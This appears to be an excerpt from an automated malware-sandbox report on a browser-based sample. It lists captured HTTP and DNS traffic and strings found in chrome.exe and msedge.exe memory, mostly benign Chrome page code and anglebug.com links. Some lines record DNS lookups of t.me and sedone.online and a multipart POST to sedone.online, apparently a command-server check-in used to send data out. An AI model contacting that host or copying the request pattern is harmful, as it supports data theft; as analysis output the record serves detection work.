          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B76581ECD2E1499D95A0E1CBD8614B37&MUID=360240197938679F2CDC554E78216658 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; SM=T
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000003.1485180897.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485084762.0000782403150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: chrome.exe, 0000000A.00000003.1485180897.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485084762.0000782403150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: t.me
          Source: global trafficDNS traffic detected: DNS query: sedone.online
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
          Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
          Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
          Source: global trafficDNS traffic detected: DNS query: deff.nelreports.net
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----MOPHDT0HDJMYUAIWTJE3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
          Source: chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205er
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
          Source: msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
          Source: chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901e
          Source: chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901e-data
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
